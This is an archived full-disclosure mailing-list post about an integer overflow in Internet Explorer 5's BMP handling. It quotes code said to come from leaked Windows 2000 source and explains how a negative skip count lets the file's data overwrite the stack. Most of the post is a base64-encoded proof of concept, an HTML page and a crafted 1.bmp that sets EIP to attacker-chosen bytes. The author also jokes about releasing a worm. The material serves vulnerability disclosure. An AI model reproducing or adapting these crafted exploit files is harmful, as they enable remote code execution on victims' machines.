Microsoft Internet Explorer Integer Overflow in Processing Bitmap Files Lets Remote Users Execute Arbitrary Code


--Hush_boundary-402f0cfb09a9f
Content-type: text/plain

I downloaded the Microsoft source code.  Easy enough.  It's a lot
bigger than Linux, but there were a lot of people mirroring it and so
it didn't take long.

Anyway, I took a look, and decided that Microsoft is ***** **** ****.
For example, in win2k/private/inet/mshtml/src/site/download/imgbmp.cxx:

    // Before we read the bits, seek to the correct location in the file
    while (_bmfh.bfOffBits > (unsigned)cbRead)
    {
        BYTE abDummy[1024];
        int cbSkip;

        cbSkip = _bmfh.bfOffBits - cbRead;
        
        if (cbSkip > 1024)
            cbSkip = 1024;

        if (!Read(abDummy, cbSkip))
            goto Cleanup;
            
        cbRead += cbSkip;
    }

.. Rrrrriiiiggghhhttt.  Way to go, using a signed integer for an
offset.  Now all we have to do is create a BMP with bfOffBits > 2^31,

and we're in. cbSkip goes negative and the Read call clobbers the
stack with our data.

See attached for proof of concept.  index.html has [img src=1.bmp]
where 1.bmp contains bfOffBits=0xEEEEEEEE plus 4k of 0x44332211.
Bring it up in IE5 (tested successfully on Win98) and get
EIP=0x44332211.

IE6 is not vulnerable, so I guess I'll get back to work.  My Warhol
worm will have to wait a bit...

.gta
PROPS TO the Fort and HAVE IT BE YOU.


--Hush_boundary-402f0cfb09a9f
Content-type: text/html; name="index.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="index.html"

PGh0bWw+PGhlYWQ+PHRpdGxlPmJvb208L3RpdGxlPjwvaGVhZD4KPGJvZHk+CjxoMT5IZWxsbzwv
aDE+CjxpbWcgc3JjPTEuYm1wIGJvcmRlcj0xPgo8L2JvZHk+CjwvaHRtbD4=

--Hush_boundary-402f0cfb09a9f
Content-type: application/octet-stream; name="1.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="1.bmp"

Qk0wWwAAAAAAAO7u7u4oAAAA4QEAAC4AAAABAAgAAAAAAAAAAAASCwAAEgsAAAAAAAAAAAAANgYV
AEwYHQBhICUAhDovAJA/MABuMCMAk0QuAJdHLwD05eAAZDEeAJdKKgCZTCwAnU0uAO7i3QCaTCkA
m00rAJJJKgBaKxMAkEgjAJRLJgCdTykAl0wnAJlOKQCwZkIAez4dAJ1QJgCbTyUAl04kAJ9RKAC2
cEsAvYJjAE8eAACeUiIAmVEjAKBUJgByPBwAnVMnAJ9WKgCERyMAo1ouAKZgNgCJVDQAf1tEAIxr
VwDe1M4AWCQAAKNYIwCXUSEAnlQkAHdNMACpbkUAn4V0ALaaiABnLQAAYCkAAI5JFQCQTBgAaDcS
AJNOHACYViYAnV0vAJRnRACteFEAw6+gAPXx7gByNAAAbTEAAIZCCgCHQwsAh0QMAIhFDgCKRxEA
jEkTAKZcHgC3k3UA1MW5AH48AAB9PAAAfDsAAHs6AAB6OQAAeTkAAHc3AAB1NgAAfz0BAH48AQB/
PgIAgD4DAIA/BACBQAUAgUEGAIJBBwCCQggAg0QKAIRECwCERQwAhUYNAIVHDgCGSBAAh0oSAIhL
EwCISxQAiU0WAItPGQCLUBoAjFEcAI1THgCOVB8ArmgnAI9WIgCRWSYAk1wrAJVfLgCXYjIAmWU1
AJtnOQCdaj0An25DAKN1SgCleE4Ap3tTAKt/VwCuhF4AqmEYAHtKGAChckUArmUSALBoCACyagEA
t3AKAJRhFgC4eR8AyYcnANmbRQD8+vcAu3QAALZvAADBfQAAvnkAAHNMBQC+fQ4A0pQiAOGoQQDH
hQAAxYIAAMOAAACudAEAyooLAMWECwDOjwAAy4sAAMmJAADIhwAAzY8LANmfIQDRkwAAyY4AAL+G
AADVmgoA0ZYLANifEQCvmGEA15wAANOYAADNlQAAwpYZAK2RRQDClAAAsYQAALCPJACLbAAAnn4E
AMikAACzlwYAc2UAALqtKgDj4LsAnZgdALq3PgB+fQAAo6EtALy7TwBpaWgA///+AKywBACLlwAA
srpNAMLIeACksh0AqLU0AHmBPACquUkAsb5hAJOsAwChrlYAjZhNAImiEwCatDYAbIsAAJ24RACg
uUgAcpkAAJK0JgCuxGwA/P35AHSfAAB5pgIAmLhBAKG8VAB8rwAAdqYAAHGhAAB/sQoAl7hHAHeu
AAByqQAAdakAAHKmAACQtj4AkrhCAHKtAABjlgAAfrMYAIS0JgCItTIAaagAAGWeAAB1sRAAirY7
AGutAACYvmAAe7QvAIy5TwBdqQAAgbdAAGuzHQBOrgEAdbdHAHq5VQCEwGkARbMnAD6yIQBjulMA
RblOAGLBcQCL06UAQsN1AP///wBKSkoANTU1ACYmJgAXFxcADQ0NAAYGBgACAgIAAAAAABEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNE
ESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QR
IjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEi
M0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIzRBEiM0QRIjNEESIz
RBEiM0Q=

--Hush_boundary-402f0cfb09a9f--



Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Editor's note:  Three words of this text have been removed at
the editor's discretion due to the offensive nature of the statement.]

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
This web site uses cookies for web analytics. Learn More
Copyright 2018, SecurityGlobal.net LLC